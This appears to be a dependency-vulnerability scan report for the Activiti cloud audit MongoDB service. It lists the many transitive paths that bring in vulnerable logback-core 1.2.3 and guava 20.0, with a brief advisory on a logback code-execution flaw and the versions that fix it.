Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Overview
ch.qos.logback:logback-core is a logback-core module.
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements via the JaninoEventEvaluator extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.
Remediation
Upgrade ch.qos.logback:logback-core to version 1.3.15, 1.5.13 or higher.
References
medium severity
- Vulnerable module: com.google.guava:guava
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
